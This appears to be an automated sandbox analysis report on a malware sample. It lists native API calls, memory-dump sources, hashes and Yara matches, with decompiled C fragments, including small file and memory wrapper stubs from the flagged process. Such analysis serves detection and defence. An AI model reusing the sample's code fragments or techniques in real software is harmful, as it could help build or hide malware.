                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0117E607
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0117A507
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • DeleteFileW.KERNELBASE(?), ref: 0117ECB9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID: DeleteFile
                                                                              • String ID:
                                                                              • API String ID: 4033686569-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • DeleteFileW.KERNELBASE(?), ref: 0117ECB9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.422183536.0000000001170000.00000040.00000001.sdmp, Offset: 01170000, based on PE: false
                                                                              Similarity
                                                                              • API ID: DeleteFile
                                                                              • String ID:
                                                                              • API String ID: 4033686569-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.429922225.0000000005460000.00000040.00000001.sdmp, Offset: 05450000, based on PE: true
                                                                              • Associated: 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmp
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.421973911.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.421973911.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7e39fe9b8fadd34acd28cffed784824e9a47ac4a87328ad43e1b7b5baa1be9f3
                                                                              • Instruction ID: d70e547dad86fffbe1118cb0020a36724dcc8a89d64e45806cd9259d9e1d8a44
                                                                              • Opcode Fuzzy Hash: 7e39fe9b8fadd34acd28cffed784824e9a47ac4a87328ad43e1b7b5baa1be9f3
                                                                              • Instruction Fuzzy Hash: E301F272808348AAE7205F19DCC4BB6BB98EF42338F18815AFE145B256C778D844E6F1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.429922225.0000000005460000.00000040.00000001.sdmp, Offset: 05450000, based on PE: true
                                                                              • Associated: 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d555a8e6b37407b9a947be1bb4af7c1ce01c4ce9aebf642d62045edce865f3a7
                                                                              • Instruction ID: 40870934528bdab207a9cb109d178aac699ba54be00cab050f0dc8e4bf3bce1d
                                                                              • Opcode Fuzzy Hash: d555a8e6b37407b9a947be1bb4af7c1ce01c4ce9aebf642d62045edce865f3a7
                                                                              • Instruction Fuzzy Hash: 3A01E274D14259AFCB50DFA8C585AEEFFF5BB08300F6081AAE958E3341D7349A40DBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.421973911.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d4163faa04f1389f2664470f51a62f057b687c12d3749052a352086a5855c9f5
                                                                              • Instruction ID: d33749be1f0a8c21e53d39f66649ba4c3376130ecf65f087229d21efe56a4a5a
                                                                              • Opcode Fuzzy Hash: d4163faa04f1389f2664470f51a62f057b687c12d3749052a352086a5855c9f5
                                                                              • Instruction Fuzzy Hash: 8EF06271804244AEEB108E16DCC4B76FB98EF41734F18C55AEE185B296C3799C48DAB1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions

                                                                              Executed Functions

                                                                              APIs
                                                                              • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID: BMA$BMA
                                                                              • API String ID: 2738559852-2163208940
                                                                              • Opcode ID: c7544984bce2b1c87228a47735bc187059da444aa0750dbd48748f4aae0cb5ec
                                                                              • Instruction ID: 4fe5b75dff92a1ce98cba4ca99c9955512d9511116462172522007c39aeb3aaa
                                                                              • Opcode Fuzzy Hash: c7544984bce2b1c87228a47735bc187059da444aa0750dbd48748f4aae0cb5ec
                                                                              • Instruction Fuzzy Hash: 94F0F4B2200108AFCB04CF99DC80EEB77ADEF8C354F158249BE0DE7251C630E8518BA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 37%
                                                                              			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                              				void* _t18;
                                                                              				void* _t27;
                                                                              				intOrPtr* _t28;
                                                                              
                                                                              				_t13 = _a4;
                                                                              				_t28 = _a4 + 0xc48;
                                                                              				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                              				_t6 =  &_a32; // 0x414d42
                                                                              				_t12 =  &_a8; // 0x414d42
                                                                              				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                              				return _t18;
                                                                              			}

                                                                              APIs
                                                                              • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID: BMA$BMA
                                                                              • API String ID: 2738559852-2163208940
                                                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                              • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                              • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E00419D5D(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, signed char _a21, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                              				long _t23;
                                                                              				void* _t33;
                                                                              
                                                                              				_a21 = _a21 >> 0x55;
                                                                              				_t17 = _a4;
                                                                              				_t5 = _t17 + 0xc40; // 0xc40
                                                                              				E0041A960(_t33, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                              				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                              				return _t23;
                                                                              			}

                                                                              APIs
                                                                              • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID: U
                                                                              • API String ID: 823142352-3372436214
                                                                              • Opcode ID: b48e8af83ab1fa7129cf3a856df758814241a1d67651ffac608d92b04c3818d4
                                                                              • Instruction ID: 0ecc1f259e353f1aedd2b6da1ffd1d6813b637172127a466756acdc956f94e33
                                                                              • Opcode Fuzzy Hash: b48e8af83ab1fa7129cf3a856df758814241a1d67651ffac608d92b04c3818d4
                                                                              • Instruction Fuzzy Hash: FE01B2B2215208ABCB08CF88DC95EEB37E9AF8C754F158248FA1D97241C630E851CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                              • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                                                              • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                              • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                              • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                              • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                              • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                              • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID:
                                                                              • API String ID: 1836367815-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID:
                                                                              • API String ID: 1836367815-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExitProcess
                                                                              • String ID:
                                                                              • API String ID: 621844428-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LookupPrivilegeValue
                                                                              • String ID:
                                                                              • API String ID: 3899507212-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExitProcess
                                                                              • String ID:
                                                                              • API String ID: 621844428-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions

                                                                              Strings
                                                                              • *** An Access Violation occurred in %ws:%s, xrefs: 017EB48F
                                                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 017EB39B
                                                                              • The instruction at %p referenced memory at %p., xrefs: 017EB432
                                                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 017EB305
                                                                              • *** enter .exr %p for the exception record, xrefs: 017EB4F1
                                                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 017EB476
                                                                              • write to, xrefs: 017EB4A6
                                                                              • *** enter .cxr %p for the context, xrefs: 017EB50D
                                                                              • read from, xrefs: 017EB4AD, 017EB4B2
                                                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 017EB484
                                                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 017EB53F
                                                                              • an invalid address, %p, xrefs: 017EB4CF
                                                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 017EB47D
                                                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 017EB2F3
                                                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 017EB352
                                                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017EB3D6
                                                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 017EB323
                                                                              • This failed because of error %Ix., xrefs: 017EB446
                                                                              • The critical section is owned by thread %p., xrefs: 017EB3B9
                                                                              • *** then kb to get the faulting stack, xrefs: 017EB51C
                                                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 017EB314
                                                                              • *** Inpage error in %ws:%s, xrefs: 017EB418
                                                                              • Go determine why that thread has not released the critical section., xrefs: 017EB3C5
                                                                              • The instruction at %p tried to %s , xrefs: 017EB4B6
                                                                              • The resource is owned shared by %d threads, xrefs: 017EB37E
                                                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 017EB2DC
                                                                              • a NULL pointer, xrefs: 017EB4E0
                                                                              • The resource is owned exclusively by thread %p, xrefs: 017EB374
                                                                              • <unknown>, xrefs: 017EB27E, 017EB2D1, 017EB350, 017EB399, 017EB417, 017EB48E
                                                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017EB38F
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • API String ID: 0-108210295
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 44%
                                                                              			E017F1C06() {
                                                                              				signed int _t27;
                                                                              				char* _t104;
                                                                              				char* _t105;
                                                                              				intOrPtr _t113;
                                                                              				intOrPtr _t115;
                                                                              				intOrPtr _t117;
                                                                              				intOrPtr _t119;
                                                                              				intOrPtr _t120;
                                                                              
                                                                              				_t105 = 0x17148a4;
                                                                              				_t104 = "HEAP: ";
                                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                              					_push(_t104);
                                                                              					E0173B150();
                                                                              				} else {
                                                                              					E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                              				}
                                                                              				_push( *0x182589c);
                                                                              				E0173B150("Heap error detected at %p (heap handle %p)\n",  *0x18258a0);
                                                                              				_t27 =  *0x1825898; // 0x0
                                                                              				if(_t27 <= 0xf) {
                                                                              					switch( *((intOrPtr*)(_t27 * 4 +  &M017F1E96))) {
                                                                              						case 0:
                                                                              							_t105 = "heap_failure_internal";
                                                                              							goto L21;
                                                                              						case 1:
                                                                              							goto L21;
                                                                              						case 2:
                                                                              							goto L21;
                                                                              						case 3:
                                                                              							goto L21;
                                                                              						case 4:
                                                                              							goto L21;
                                                                              						case 5:
                                                                              							goto L21;
                                                                              						case 6:
                                                                              							goto L21;
                                                                              						case 7:
                                                                              							goto L21;
                                                                              						case 8:
                                                                              							goto L21;
                                                                              						case 9:
                                                                              							goto L21;
                                                                              						case 0xa:
                                                                              							goto L21;
                                                                              						case 0xb:
                                                                              							goto L21;
                                                                              						case 0xc:
                                                                              							goto L21;
                                                                              						case 0xd:
                                                                              							goto L21;
                                                                              						case 0xe:
                                                                              							goto L21;
                                                                              						case 0xf:
                                                                              							goto L21;
                                                                              					}
                                                                              				}
                                                                              				L21:
                                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                              					_push(_t104);
                                                                              					E0173B150();
                                                                              				} else {
                                                                              					E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                              				}
                                                                              				_push(_t105);
                                                                              				E0173B150("Error code: %d - %s\n",  *0x1825898);
                                                                              				_t113 =  *0x18258a4; // 0x0
                                                                              				if(_t113 != 0) {
                                                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                              						_push(_t104);
                                                                              						E0173B150();
                                                                              					} else {
                                                                              						E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                              					}
                                                                              					E0173B150("Parameter1: %p\n",  *0x18258a4);
                                                                              				}
                                                                              				_t115 =  *0x18258a8; // 0x0
                                                                              				if(_t115 != 0) {
                                                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                              						_push(_t104);
                                                                              						E0173B150();
                                                                              					} else {
                                                                              						E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                              					}
                                                                              					E0173B150("Parameter2: %p\n",  *0x18258a8);
                                                                              				}
                                                                              				_t117 =  *0x18258ac; // 0x0
                                                                              				if(_t117 != 0) {
                                                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                              						_push(_t104);
                                                                              						E0173B150();
                                                                              					} else {
                                                                              						E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                              					}
                                                                              					E0173B150("Parameter3: %p\n",  *0x18258ac);
                                                                              				}
                                                                              				_t119 =  *0x18258b0; // 0x0
                                                                              				if(_t119 != 0) {
                                                                              					L41:
                                                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                              						_push(_t104);
                                                                              						E0173B150();
                                                                              					} else {
                                                                              						E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                              					}
                                                                              					_push( *0x18258b4);
                                                                              					E0173B150("Last known valid blocks: before - %p, after - %p\n",  *0x18258b0);
                                                                              				} else {
                                                                              					_t120 =  *0x18258b4; // 0x0
                                                                              					if(_t120 != 0) {
                                                                              						goto L41;
                                                                              					}
                                                                              				}
                                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                              					_push(_t104);
                                                                              					E0173B150();
                                                                              				} else {
                                                                              					E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                              				}
                                                                              				return E0173B150("Stack trace available at %p\n", 0x18258c0);
                                                                              			}












                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                              • API String ID: 0-2897834094
                                                                              • Opcode ID: d44620f31007172ead41c45aaaf57e7be9c68bb6f01141b018e0e4cab8a43839
                                                                              • Instruction ID: 5757da4b58ecb61db55a2815a4b5d42cc65b3a056331bd264293c403ad5461a6
                                                                              • Opcode Fuzzy Hash: d44620f31007172ead41c45aaaf57e7be9c68bb6f01141b018e0e4cab8a43839
                                                                              • Instruction Fuzzy Hash: 6F61D473554155DFD221AB8DD498E36F3A4EB04A30F4980BFFB095B345DAB49982CF0A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 96%
                                                                              			E01743D34(signed int* __ecx) {
                                                                              				signed int* _v8;
                                                                              				char _v12;
                                                                              				signed int* _v16;
                                                                              				signed int* _v20;
                                                                              				char _v24;
                                                                              				signed int _v28;
                                                                              				signed int _v32;
                                                                              				char _v36;
                                                                              				signed int _v40;
                                                                              				signed int _v44;
                                                                              				signed int* _v48;
                                                                              				signed int* _v52;
                                                                              				signed int _v56;
                                                                              				signed int _v60;
                                                                              				char _v68;
                                                                              				signed int _t140;
                                                                              				signed int _t161;
                                                                              				signed int* _t236;
                                                                              				signed int* _t242;
                                                                              				signed int* _t243;
                                                                              				signed int* _t244;
                                                                              				signed int* _t245;
                                                                              				signed int _t255;
                                                                              				void* _t257;
                                                                              				signed int _t260;
                                                                              				void* _t262;
                                                                              				signed int _t264;
                                                                              				void* _t267;
                                                                              				signed int _t275;
                                                                              				signed int* _t276;
                                                                              				short* _t277;
                                                                              				signed int* _t278;
                                                                              				signed int* _t279;
                                                                              				signed int* _t280;
                                                                              				short* _t281;
                                                                              				signed int* _t282;
                                                                              				short* _t283;
                                                                              				signed int* _t284;
                                                                              				void* _t285;
                                                                              
                                                                              				_v60 = _v60 | 0xffffffff;
                                                                              				_t280 = 0;
                                                                              				_t242 = __ecx;
                                                                              				_v52 = __ecx;
                                                                              				_v8 = 0;
                                                                              				_v20 = 0;
                                                                              				_v40 = 0;
                                                                              				_v28 = 0;
                                                                              				_v32 = 0;
                                                                              				_v44 = 0;
                                                                              				_v56 = 0;
                                                                              				_t275 = 0;
                                                                              				_v16 = 0;
                                                                              				if(__ecx == 0) {
                                                                              					_t280 = 0xc000000d;
                                                                              					_t140 = 0;
                                                                              					L50:
                                                                              					 *_t242 =  *_t242 | 0x00000800;
                                                                              					_t242[0x13] = _t140;
                                                                              					_t242[0x16] = _v40;
                                                                              					_t242[0x18] = _v28;
                                                                              					_t242[0x14] = _v32;
                                                                              					_t242[0x17] = _t275;
                                                                              					_t242[0x15] = _v44;
